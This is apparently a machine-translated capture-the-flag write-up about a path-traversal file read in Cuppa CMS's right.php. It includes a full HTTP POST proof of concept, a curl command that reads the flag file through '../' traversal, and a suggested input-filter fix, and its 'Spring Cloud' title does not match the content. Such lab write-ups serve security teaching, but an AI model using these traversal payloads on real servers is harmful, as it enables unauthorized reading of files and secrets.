Spring Cloud Environment: CVE-2022-25401 (arbitrary file read vulnerability)

Enterprise 2023-05-17 11:50:30 views: null

Table of contents

1. Topic

Two, curl access flag file

1. Topic

introduce:

        There is an arbitrary file read vulnerability in the Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php file 

Entering the topic is a login page

Both sql and brute force have no solution.

Official POC

 National Information Security Vulnerability Database

cve vulnerability introduction

The official gave the wrong directory without administrator/ can not find

official poc

 code block:

POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: 192.168.174.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini

 Burp captured and changed the package: but it was unsuccessful: it may be a directory problem.

Two, curl access flag file

 Enter the directory templates/default/html/windows/right.php  

Returning a blank page here means that there is this file, and if it does not exist, it will return 404.

Enter the templates/default/html directory

 right.php in windows directory

 View source code:

 Kali's curl requests access to the flag file in the root directory

        curl is a command-line tool that is used to issue network requests, then get and extract data, and display it on "standard output" (stdout). It supports a variety of protocols to view the source code of the web page. You can directly add the URL after the curl command, and you can see the source code of the web page.

curl -X POST "http://xxx.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"

 get the flag

flag{fa417734-dac9-4947-831f-67b3ed302120} 

Attached:

Vulnerability repair suggestion
In the '/templates/default/html/windows/right.php' file, line 53 suggests adding the following code:

$url = $_POST["url"];
if(strstr($url, "../") || strstr($url, "..\\")){
    echo "Security attack!";
    exit;
}
include realpath(DIR . '/../../../..')."/".$url;


 

Guess you like

Origin blog.csdn.net/m0_65712192/article/details/130306670
Recommended
Face Wall Intelligence releases the Eurux-8x22B open source large model - it can be called the "science champion"
Kaiyuan Daily | Google supports Hongmeng to take over; open source Rabbit R1; Android phones supported by Docker; Microsoft’s anxiety and ambition; Haier Electric shuts down the open platform
Ranking
Jianzhi offer interview questions 68-II. The nearest common ancestor of a binary tree (recursive)
jQuery Mobile development 1-UI components
Summary of Kotlin function knowledge
[ZZ] The Naked Truth About Anisotropic Filtering
Diagnosis: record a recovery of abnormal CRASH storage caused the database to be unable to be opened normally
Redis introduction and Linux installation Redis
Experiment 2 Introduction to switches
glances open source command-line system monitoring tools introduced
Use of selector
vue3 handwriting a carousel picture
Daily
More
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)

Code World

© 2018 codetd.com